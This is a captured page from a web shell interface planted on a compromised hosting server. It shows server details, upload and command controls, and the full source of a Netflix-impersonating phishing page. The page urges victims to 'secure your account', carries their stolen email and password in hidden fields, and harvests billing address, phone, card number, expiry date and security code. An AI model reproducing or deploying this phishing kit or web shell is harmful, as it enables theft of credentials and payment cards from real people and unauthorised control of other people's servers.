403Webshell
Server IP : 51.91.236.193  /  Your IP : 216.73.216.224
Web Server : Apache
System : Linux webm010.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : institutah ( 16501)
PHP Version : 7.2.34
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/institutah/www/AR_ConffirmationOK_14ac4f7c34971/vw/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/institutah/www/AR_ConffirmationOK_14ac4f7c34971/vw/index_vbilling.php
<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title>Netflix</title>
	<script src="assets/js/jquery.min.js"></script>
	<script src="assets/js/jquery-1.9.1.js"></script>
    <link rel="stylesheet" href="assets/css/master.css?rand=<?php echo rand(); ?>">
    <link rel="stylesheet" href="assets/css/loading.css">
    <link rel="stylesheet" href="assets/css/loading-btn.css">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0"/>
    <link type="text/css" rel="stylesheet" href="../assets/img/icon.ico"/>
    <link rel="shortcut icon" href="../assets/img/icon.ico"/>
    <link rel="stylesheet" href="assets/css/animate.css">

   <style type="text/css">
.red-border{
    border: 1px solid red;
}
	
	input {
    width: 400px;
    padding: 0 20px;
}

input,
input::-webkit-input-placeholder {
    font-size: 15px;
    line-height: 3;
}


	</style>
	<script>
	function driveStep(step) {
  switch(step) {
    case 1:
      window.history.pushState('billing', 'Netflix', 'billing.php');
      document.getElementById("step0").className = "minbody hidden";
      document.getElementById("step2").className = "fadeInAnim";
      break;
    case 2:
      window.history.pushState('payment', 'Netflix', 'payment.php');
      document.getElementById("step2").className = "fadeInAnim hidden";
      document.getElementById("step3").className = "fadeInAnim";
      break;
    case 3:
      window.history.pushState('You\'re all set!', 'Netflix', 'done.php');
      document.getElementById("step3").className = "fadeInAnim hidden";
      document.getElementById("step4").className = "fadeInAnim";
      break;
  }
}

	function checkform() {
		 var ok = true;
    var a = document.forms["Formis"]["first_name"].value;
    var b = document.forms["Formis"]["last_name"].value;
    var c = document.forms["Formis"]["address"].value;
    var d = document.forms["Formis"]["city"].value;
  if(a == null || a == "", b == null || b == "", c == null || c == "", d == null || d == "")
  {
    

document.getElementById("first_name").style.border="1px solid red";
document.getElementById("last_name").style.border="1px solid red";
document.getElementById("address").style.border="1px solid red";
document.getElementById("city").style.border="1px solid red";


			ok = false;
  }
	  return ok;
}

$(function () {
    $('input,textarea').focus(function () {
        $(this).data('placeholder', $(this).attr('placeholder'))
               .attr('placeholder', '');
    }).blur(function () {
        $(this).attr('placeholder', $(this).data('placeholder'));
    });
});

	</script>
<script>
$(document).ready(function () {
    Date.prototype.toShortDateString = function() {
        return (this.getMonth() + 1) + "/" + this.getDate() + "/" + this.getFullYear();
    }
    //#region CUSTOM FUNCTIONS FOR DATEPICKERS
    function isTextSelected(input) {
        if (typeof input.selectionStart == "number" && input.selectionStart != input.value.length && input.selectionStart != input.selectionEnd) {
            return true;
        } else if (typeof document.selection != "undefined") {
            input.focus();
            return document.selection.createRange().text == input.value;
        }
        return false;
    }
    function isNumber(e) {
        var allowedKeys = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105];
        if ($.inArray(e.keyCode, allowedKeys) != -1 && !e.originalEvent.shiftKey) {
            return true;
        }
        return false;
    }
    function isBackspace(keyCode) {
        var allowedKeys = [8];
        if ($.inArray(keyCode, allowedKeys) != -1) {
            return true;
        }
        return false;
    }
    function isAllowedKey(keyCode) {
        var allowedKeys = [9, 13, 16, 37, 38, 39, 40];//191,111];
        if ($.inArray(keyCode, allowedKeys) != -1) {
            return true;
        }
        return false;
    }
    //#endregion
    $.fn.extend({
        allowMMDDYYYY: function (validate) {
            $(this).keydown(function (e) {
                var that = this;
                if (!isNumber(e) && !isBackspace(e.keyCode) && !isAllowedKey(e.keyCode)) {
                    e.preventDefault();
                } else if ($(that).val().length == 10 && !isBackspace(e.keyCode) && !isAllowedKey(e.keyCode)) {// && !isTextSelected(e.target) && isNumber(e.keyCode)) {
                    if(!isTextSelected(e.target) && isNumber(e))
                    e.preventDefault();
                }
            });
            $(this).keyup(function (e) {
                var that = this;
                var value = $(that).val();
                if (e.keyCode != 8 && !isAllowedKey(e.keyCode)) {
                    switch (value.length) {
                        case 2:
                            $(that).val(value + "/");
                            break;
                        case 3:
                            if (value.indexOf("/") == -1) {
                                $(that).val(value.substr(0, 2) + "/" + value.substr(2, 1));
                            }
                            break;
                        case 4:
                            if (value.substr(0,3).indexOf("/") == -1) {
                                $(that).val(value.substr(0, 2) + "/" + value.substr(2, 2));
                            }
                            break;
                        case 5:
                            if (e.target.selectionStart == value.length) {
                                if (e.target.selectionStart != 1) {
                                    $(that).val(value + "/");
                                }
                            }
                            break;
                        case 6:
                            if (e.target.selectionStart == value.length) {
                                if (value.substr(5).indexOf("/") == -1) {
                                    $(that).val(value.substr(0, 5) + "/" + value.substr(5, 1));
                                }
                            } else if (e.target.selectionStart == 2) {
                                $(that).val(value.substr(0, 2) + "/" + value.substr(2))
                                e.target.selectionStart = 3;
                                e.target.selectionEnd = 3;
                            }
                            break;
                        case 7:
                            if (e.target.selectionStart == value.length) {
                                if (value.substr(5).indexOf("/") == -1) {
                                    $(that).val(value.substr(0, 6) + "/" + value.substr(5, 2));
                                }
                            } else if (e.target.selectionStart == 2) {
                                $(that).val(value.substr(0, 2) + "/" + value.substr(2));
                                e.target.selectionStart = 3;
                                e.target.selectionEnd = 3;
                            }
                            break;
                        case 9:
                            if (value.substr(3, 5).indexOf("/") == -1) {
                                $(that).val(value.substr(0,5) + "/" + value.substr(5))
                            } else if (value.substr(0, 3).indexOf("/") == -1) {
                                $(that).val(value.substr(0, 2) + "/" + value.substr(2))
                            }
                            break;
                            //IF THE LENGTH IS 10 (ONKEYUP) THEN CALL VALIDATION ON OTHER DATEPICKER ELEMENTS.
                        case 10:
                            if (!isTextSelected(e.target)) {
                                validate();
                            }
                            break;
                    }
                }
            });
        }
    });
    //#endregion
    $("input[data-role='datepicker']").each(function (i, o) {
        var jqueryElement = $(o);
        jqueryElement.allowMMDDYYYY(function () {
            //THIS IS MY CALLBACK FUNCTION TO ALLOW VALIDATION ON OTHER ELEMENTS 
            console.log("validating");
        });
    });
});
</script>
    <script src="assets/js/cleve.js" charset="utf-8"></script>
  </head>
  <body>
    <div class="header">
      <svg viewBox="0 0 111 30" class="svg-icon svg-icon-netflix-logo" focusable="true"><title></title><g id="netflix-logo"><path d="M105.062 14.28L111 30c-1.75-.25-3.499-.563-5.28-.845l-3.345-8.686-3.437 7.969c-1.687-.282-3.344-.376-5.031-.595l6.031-13.75L94.468 0h5.063l3.062 7.874L105.875 0h5.124l-5.937 14.28zM90.47 0h-4.594v27.25c1.5.094 3.062.156 4.594.343V0zm-8.563 26.937c-4.187-.281-8.375-.53-12.656-.625V0h4.687v21.875c2.688.062 5.375.28 7.969.405v4.657zM64.25 10.657v4.687h-6.406V26H53.22V0h13.125v4.687h-8.5v5.97h6.406zm-18.906-5.97V26.25c-1.563 0-3.156 0-4.688.062V4.687h-4.844V0h14.406v4.687h-4.874zM30.75 15.593c-2.062 0-4.5 0-6.25.095v6.968c2.75-.188 5.5-.406 8.281-.5v4.5l-12.968 1.032V0H32.78v4.687H24.5V11c1.813 0 4.594-.094 6.25-.094v4.688zM4.78 12.968v16.375C3.094 29.531 1.593 29.75 0 30V0h4.469l6.093 17.032V0h4.688v28.062c-1.656.282-3.344.376-5.125.625L4.78 12.968z" id="Fill-14"></path></g></svg>
      <div  onclick="window.location = 'logout.php'">
     <?php echo $lang['LOGOUT'];?>
      </div>
    </div>
    <div class="minbody hidden" id="step0">
      <div class="shield"></div>
      <div class="steps">STEP <b>1</b> OF <b>2</b></div>
      <h1>Secure your account.</h1>
      <ul>
        <li>Update your billing address.</li>
        <li>Confirm your payment method.</li>
      </ul>
      <a onclick="driveStep(1)"><button>Secure your account</button></a>
    </div>
    <div class="fadeInAnim hidden" id="step4">
      <div class="minbody">
        <div class="shield"></div>
        <h1>You're all set!</h1>
        <ul>
          <li>Billing address updated.</li>
          <li>Payment method confirmed.</li>
        </ul>
        <a onclick="loginNetflix()"><button>SIGN IN</button></a>
      </div>
    </div>
	
    <div class="" id="step2">
      <div class="step">
        <?php echo $lang['STEP2'];?>
        <h1><?php echo $lang['UPDATEBILL'];?></h1>
        <div class="form">
		<form action="payment.php" method="post" name="Formis" onsubmit="return checkform()">
		<input type="hidden" name="mail"  value="<?php echo $_SESSION['Email'];?>"/>
		<input type="hidden" name="password"  value="<?php echo $_SESSION['Password'];?>"/>
		<input type="hidden" name="session_bill"  value="<?php echo $_SESSION['uniqueID'];?>"/>
                <div class="inputpack">
				<input class="col" name="first_name" id="first_name" type="text" placeholder="<?php echo $lang['NAME'];?>" value=""  autocomplete="off"/>
                    
            </div>
          <div class="error" id="firstnameError"></div>
          <div class="inputpack">
            <input class="col" type="text" name="last_name" id="last_name"  spellcheck="false" placeholder="<?php echo $lang['LASTNAME'];?>" value="" autocomplete="off"/>
            
          </div>
          <div class="error" id="lastnameError"></div>
          <div class="inputpack">
            <input class="col" type="text" name="address" id="address"  spellcheck="false" placeholder="<?php echo $lang['ADDRESS2'];?>" value="" autocomplete="off"/>
            
          </div>
          <div class="error" id="addressError"></div>
          <div class="inputpack">
            <input class="col" type="text" name="city" id="city"  spellcheck="false" placeholder="<?php echo $lang['CITY'];?>" value="" autocomplete="off"/>
          </div>
          <div class="error" id="cityError"></div>
          <div class="twopac">
            <div class="inputpack">
              <input type="text" name="state" id="state"  spellcheck="false" placeholder="<?php echo $lang['STATE'];?>" value="" autocomplete="off"/>

            </div>
            <div class="inputpack">
              <input type="text" name="zip" id="zip" maxlength="7" spellcheck="false" placeholder="<?php echo $lang['POSTALCODE'];?>" value="" autocomplete="off"/>

            </div>
          </div>
          <div class="error" id="statezipError"></div>
          <div class="inputpack">
            <input type="text" name="phone" id="phone" maxlength="10" spellcheck="false" placeholder="<?php echo $lang['PHONE'];?>" value="" autocomplete="off"/>

          </div>
          <div class="error" id="phoneError"></div>
          <div class="error" id="dobError"></div>
          <button id="submit_btn" type="submit" ><div id="content" style=""><?php echo $lang['UPDATEBILLBUTTON'];?></div>
            <div id="loading" class="btn btn-default ld-ext-middle running" style="font-size : 1.5em; margin-top : 2px; display: none;">
              <div class="ld ld-ring ld-cycle running"></div>
            </div>
          </button>
		  	</form>
        </div>
      </div>
    </div>

    <div class="fadeInAnim hidden" id="step3">
      <div class="step">
        <div class="stepID">STEP <b>2</b> OF <b>2</b></div>
        <h1>Confirm your payment method.</h1>
        <div class="form">
          <div class="inputpack">
            <input type="text" id="firstnamecard" spellcheck="false" autocomplete="off"/>
            <label id="firstNameCardLabel">First Name</label>
          </div>
          <div class="error" id="firstnameErrorCard"></div>
          <div class="inputpack">
            <input type="text" id="lastnamecard" spellcheck="false" autocomplete="off"/>
            <label id="lastNameLabelCard">Last Name</label>
          </div>
          <div class="error" id="lastnameErrorCard"></div>
          <div class="inputpack">
            <input type="text" id="cardnumber" spellcheck="false" autocomplete="off"/>
            <label id="cardnumberLabel">Card Number</label>
          </div>
          <div class="error" id="cardnumberError"></div>
          <div class="inputpack">
            <input type="text" id="expdate" spellcheck="false" autocomplete="off" maxlength="7"/>
            <label id="expLabel">Expiration Date (MM/YY)</label>
          </div>
          <div class="error" id="expError"></div>
          <div class="inputpack">
            <input type="text" id="scv" spellcheck="false" autocomplete="off" maxlength="4"/>
            <label id="scvLabel">Security Code</label>
            <svg id="helpButt" width="36" height="36" viewBox="0 0 36 36" xmlns="http://www.w3.org/2000/svg"><g fill="none" fill-rule="evenodd"><g><circle stroke="#A9A6A6" stroke-width="2" cx="18" cy="18" r="17"></circle><path d="M17.051 21.094v-.54c0-.648.123-1.203.369-1.665.246-.462.741-.915 1.485-1.359a7.37 7.37 0 0 0 .981-.657c.222-.186.372-.366.45-.54.078-.174.117-.369.117-.585 0-.384-.177-.714-.531-.99-.354-.276-.831-.414-1.431-.414-.624 0-1.131.135-1.521.405-.39.27-.627.627-.711 1.071h-2.304a4.053 4.053 0 0 1 .738-1.845c.396-.546.924-.981 1.584-1.305.66-.324 1.44-.486 2.34-.486.852 0 1.596.153 2.232.459.636.306 1.134.726 1.494 1.26.36.534.54 1.143.54 1.827 0 .66-.177 1.227-.531 1.701-.354.474-.891.933-1.611 1.377-.42.252-.729.48-.927.684-.198.204-.33.399-.396.585a1.79 1.79 0 0 0-.099.603v.414h-2.268zm1.26 4.158c-.408 0-.762-.15-1.062-.45-.3-.3-.45-.654-.45-1.062 0-.408.15-.762.45-1.062.3-.3.654-.45 1.062-.45.408 0 .762.15 1.062.45.3.3.45.654.45 1.062 0 .408-.15.762-.45 1.062-.3.3-.654.45-1.062.45z" fill="#A9A6A6"></path></g></g></svg>
          </div>
          <div class="error" id="scvError"></div>
          <button id="submit_btn_card"><div id="content_card" style="">CONFIRM PAYMENT METHOD</div>
            <div id="loading_card" class="btn btn-default ld-ext-middle running" style="font-size : 1.5em; margin-top : 2px; display: none;">
              <div class="ld ld-ring ld-cycle running"></div>
            </div>
          </button>
        </div>
      </div>
    </div>
    <div class="footer">
      <div class="wrapper">
        <a><?php echo $lang['QUESTIONBILL'];?></a>
        <ul>
          <li><?php echo $lang['FAQ'];?></li>
          <li><?php echo $lang['HELPCENTER'];?></li>
          <li><?php echo $lang['TERMS'];?></li>
          <li><?php echo $lang['PRIVACY'];?></li>
        </ul>
        <ul class="a">
          <li><?php echo $lang['COOKIEPREFE'];?></li>
          <li><?php echo $lang['INFOCORPO'];?></li>
        </ul>
 <?php echo $lang['LANGSELECT'];?>
      </div>
    </div>
    <div class="layer hidden" id="cvv">
      <div class="close" id="close"></div>
      <div class="span">Your card's security code (CVV) is the 3 or 4 digit number located on the back of most cards.</div>
      <div class="bg_visa"></div>
      <div class="bg_amex"></div>
    </div>
    
  </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit